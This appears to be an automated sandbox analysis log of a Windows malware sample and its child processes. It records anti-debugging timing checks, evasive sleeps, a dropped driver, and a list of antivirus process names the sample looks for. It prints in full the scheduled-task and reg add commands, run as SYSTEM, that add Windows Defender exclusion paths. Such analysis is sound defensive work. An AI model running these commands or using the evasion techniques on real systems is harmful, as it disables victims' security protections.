              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeRDTSC instruction interceptor: First address: 1400010D8 second address: 1400010EF instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a mov ecx, eax 0x0000000c nop 0x0000000d nop 0x0000000e dec eax 0x0000000f xor edx, edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 fldpi 0x00000015 frndint 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeRDTSC instruction interceptor: First address: 1400010EF second address: 1400010EF instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 xor ebx, ebx 0x00000009 dec eax 0x0000000a mov ebx, edx 0x0000000c dec eax 0x0000000d or eax, ebx 0x0000000f dec eax 0x00000010 sub eax, ecx 0x00000012 nop 0x00000013 dec ebp 0x00000014 xor edx, edx 0x00000016 dec esp 0x00000017 mov edx, eax 0x00000019 dec ebp 0x0000001a cmp edx, eax 0x0000001c jc 00007F6BC1057350h 0x0000001e fldpi 0x00000020 frndint 0x00000022 rdtsc
              Source: C:\Users\user\Documents\7tqorj.exeRDTSC instruction interceptor: First address: 528305 second address: 528313 instructions: 0x00000000 rdtsc 0x00000002 dec esp 0x00000003 mov ecx, edx 0x00000005 dec ecx 0x00000006 shl ecx, 20h 0x00000009 dec esp 0x0000000a or ecx, eax 0x0000000c frndint 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeDropped PE file which has not been started: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
              Source: C:\Program Files (x86)\2U36F\NroRNr.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_43-3244
              Source: C:\Users\user\Documents\7tqorj.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_5-14081
              Source: C:\Users\user\Documents\7tqorj.exeAPI coverage: 2.7 %
              Source: C:\Users\user\Documents\7tqorj.exe TID: 1408Thread sleep time: -40000s >= -30000sJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exe TID: 5348Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exe TID: 5348Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe TID: 6620Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe TID: 4000Thread sleep time: -35000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe TID: 1096Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe TID: 5912Thread sleep count: 37 > 30Jump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe TID: 6404Thread sleep count: 79 > 30Jump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe TID: 6404Thread sleep time: -39500s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe TID: 5912Thread sleep count: 46 > 30Jump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe TID: 1776Thread sleep count: 72 > 30Jump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe TID: 1776Thread sleep time: -36000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe TID: 1096Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeLast function: Thread delayed
              Source: C:\Users\user\Documents\7tqorj.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeLast function: Thread delayed
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Documents\7tqorj.exeCode function: 5_2_00007FFDA580A1B8 FindFirstFileExW,5_2_00007FFDA580A1B8
              Source: C:\Users\user\Documents\7tqorj.exeThread delayed: delay time: 60000Jump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeThread delayed: delay time: 60000Jump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeThread delayed: delay time: 30000Jump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeThread delayed: delay time: 30000Jump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
              Source: qNHTRl.exe, 00000029.00000002.3974221880.0000000000957000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Documents\7tqorj.exeAPI call chain: ExitProcess graph end nodegraph_5-14082
              Source: C:\Users\user\Documents\7tqorj.exeAPI call chain: ExitProcess graph end nodegraph_5-14426
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeCode function: 5_2_00000001400073E0 LdrLoadDll,5_2_00000001400073E0
              Source: C:\Users\user\Documents\7tqorj.exeCode function: 5_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0000000140007C91
              Source: C:\Users\user\Documents\7tqorj.exeCode function: 5_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_000000014000F000
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeCode function: 41_3_02700643 mov eax, dword ptr fs:[00000030h]41_3_02700643
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeCode function: 41_3_02700643 mov eax, dword ptr fs:[00000030h]41_3_02700643
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeCode function: 41_3_027000CD mov eax, dword ptr fs:[00000030h]41_3_027000CD
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeCode function: 41_3_027000CD mov eax, dword ptr fs:[00000030h]41_3_027000CD
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeCode function: 41_3_02700643 mov eax, dword ptr fs:[00000030h]41_3_02700643
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeCode function: 41_3_02700643 mov eax, dword ptr fs:[00000030h]41_3_02700643
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeCode function: 41_3_027000CD mov eax, dword ptr fs:[00000030h]41_3_027000CD
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeCode function: 41_3_027000CD mov eax, dword ptr fs:[00000030h]41_3_027000CD
              Source: C:\Users\user\Documents\7tqorj.exeCode function: 5_2_0000000140004630 GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapAlloc,5_2_0000000140004630
              Source: C:\Users\user\Documents\7tqorj.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeCode function: 5_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0000000140007C91
              Source: C:\Users\user\Documents\7tqorj.exeCode function: 5_2_00000001400106B0 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00000001400106B0
              Source: C:\Users\user\Documents\7tqorj.exeCode function: 5_2_00000001400092E0 SetUnhandledExceptionFilter,5_2_00000001400092E0
              Source: C:\Users\user\Documents\7tqorj.exeCode function: 5_2_00007FFDA5802630 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFDA5802630
              Source: C:\Users\user\Documents\7tqorj.exeCode function: 5_2_00007FFDA58076E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFDA58076E0
              Source: C:\Users\user\Documents\7tqorj.exeCode function: 5_2_00007FFDA5801F50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFDA5801F50
              Source: C:\Program Files (x86)\2U36F\NroRNr.exeCode function: 43_2_00FA2AE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,43_2_00FA2AE2
              Source: C:\Program Files (x86)\2U36F\NroRNr.exeCode function: 43_2_00FA10CC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,43_2_00FA10CC
              Source: C:\Program Files (x86)\2U36F\NroRNr.exeCode function: 43_2_00FA51FB __NMSG_WRITE,_raise,SetUnhandledExceptionFilter,UnhandledExceptionFilter,43_2_00FA51FB

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Documents\7tqorj.exeNtAllocateVirtualMemory: Indirect: 0x140006FD0Jump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeNtProtectVirtualMemory: Indirect: 0x2ABB253Jump to behavior
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeNtDelayExecution: Indirect: 0x1F94D2Jump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeNtProtectVirtualMemory: Indirect: 0x2ACB253Jump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeNtProtectVirtualMemory: Indirect: 0x2A7B253Jump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess created: C:\Program Files (x86)\qNHTRl\qNHTRl.exe "C:\Program Files (x86)\qNHTRl\qNHTRl.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /fJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /fJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /fJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /fJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\programdata\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
              Source: C:\Users\user\Documents\7tqorj.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
              Source: C:\Users\user\Documents\7tqorj.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\program files (x86)\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
              Source: C:\Users\user\Documents\7tqorj.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"%userprofile%\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
              Source: C:\Users\user\Documents\7tqorj.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\programdata\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /fJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /fJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\program files (x86)\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /fJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"%userprofile%\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /fJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeCode function: 5_2_00007FFDA580FD40 cpuid 5_2_00007FFDA580FD40
              Source: C:\Users\user\Documents\7tqorj.exeCode function: GetLocaleInfoA,5_2_000000014000F370
              Source: C:\Program Files (x86)\2U36F\NroRNr.exeCode function: GetLocaleInfoA,43_2_00FA6B1A
              Source: C:\Users\user\Documents\7tqorj.exeCode function: 5_2_000000014000A370 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,5_2_000000014000A370
              Source: C:\Users\user\Documents\7tqorj.exeCode function: 5_2_0000000140005A70 GetStartupInfoW,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,5_2_0000000140005A70
              Source: 7tqorj.exe, 00000005.00000002.2717314493.0000000002898000.00000002.00001000.00020000.00000000.sdmp, 7tqorj.exe, 00000006.00000002.2727392092.0000000002848000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3976830327.000000000311D000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: kxetray.exe
              Source: 7tqorj.exe, 00000005.00000002.2717314493.0000000002898000.00000002.00001000.00020000.00000000.sdmp, 7tqorj.exe, 00000006.00000002.2727392092.0000000002848000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3976830327.000000000311D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: vsserv.exe
              Source: 7tqorj.exe, 00000005.00000002.2717314493.0000000002898000.00000002.00001000.00020000.00000000.sdmp, 7tqorj.exe, 00000006.00000002.2727392092.0000000002848000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3976830327.000000000311D000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avcenter.exe
              Source: 7tqorj.exe, 00000005.00000002.2717314493.0000000002898000.00000002.00001000.00020000.00000000.sdmp, 7tqorj.exe, 00000006.00000002.2727392092.0000000002848000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3976830327.000000000311D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: KSafeTray.exe
              Source: 7tqorj.exe, 00000005.00000002.2717314493.0000000002898000.00000002.00001000.00020000.00000000.sdmp, 7tqorj.exe, 00000006.00000002.2727392092.0000000002848000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3976830327.000000000311D000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avp.exe
              Source: qNHTRl.exe, qNHTRl.exe, 00000029.00000002.3976830327.000000000311D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360safe.exe
              Source: qNHTRl.exe, 00000029.00000002.3976830327.000000000311D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: SuperKiller.exe
              Source: qNHTRl.exe, qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: msmpeng.exe
              Source: qNHTRl.exe, 00000029.00000002.3976830327.000000000311D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: Autoruns.exe
              Source: 7tqorj.exe, 00000005.00000002.2717314493.0000000002898000.00000002.00001000.00020000.00000000.sdmp, 7tqorj.exe, 00000006.00000002.2727392092.0000000002848000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3976830327.000000000311D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360Safe.exe
              Source: qNHTRl.exe, 00000029.00000002.3976830327.000000000311D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: mcshield.exe
              Source: 7tqorj.exe, 00000005.00000002.2717314493.0000000002898000.00000002.00001000.00020000.00000000.sdmp, 7tqorj.exe, 00000006.00000002.2727392092.0000000002848000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3976830327.000000000311D000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 360tray.exe
              Source: 7tqorj.exe, 00000005.00000002.2717314493.0000000002898000.00000002.00001000.00020000.00000000.sdmp, 7tqorj.exe, 00000006.00000002.2727392092.0000000002848000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3976830327.000000000311D000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: rtvscan.exe
              Source: 7tqorj.exe, 00000005.00000002.2717314493.0000000002898000.00000002.00001000.00020000.00000000.sdmp, 7tqorj.exe, 00000006.00000002.2727392092.0000000002848000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3976830327.000000000311D000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ashDisp.exe
              Source: 7tqorj.exe, 00000005.00000002.2717314493.0000000002898000.00000002.00001000.00020000.00000000.sdmp, 7tqorj.exe, 00000006.00000002.2727392092.0000000002848000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3976830327.000000000311D000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
              Source: qNHTRl.exe, qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3976830327.000000000311D000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 360Tray.exe
              Source: 7tqorj.exe, 00000005.00000002.2717314493.0000000002898000.00000002.00001000.00020000.00000000.sdmp, 7tqorj.exe, 00000006.00000002.2727392092.0000000002848000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avgwdsvc.exe
              Source: 7tqorj.exe, 00000005.00000002.2717314493.0000000002898000.00000002.00001000.00020000.00000000.sdmp, 7tqorj.exe, 00000006.00000002.2727392092.0000000002848000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: AYAgent.aye
              Source: 7tqorj.exe, 00000005.00000002.2717314493.0000000002898000.00000002.00001000.00020000.00000000.sdmp, 7tqorj.exe, 00000006.00000002.2727392092.0000000002848000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3976830327.000000000311D000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: QUHLPSVC.EXE
              Source: 7tqorj.exe, 00000005.00000002.2717314493.0000000002898000.00000002.00001000.00020000.00000000.sdmp, 7tqorj.exe, 00000006.00000002.2727392092.0000000002848000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3976830327.000000000311D000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: RavMonD.exe
              Source: 7tqorj.exe, 00000005.00000002.2717314493.0000000002898000.00000002.00001000.00020000.00000000.sdmp, 7tqorj.exe, 00000006.00000002.2727392092.0000000002848000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3976830327.000000000311D000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
              Source: qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Mcshield.exe
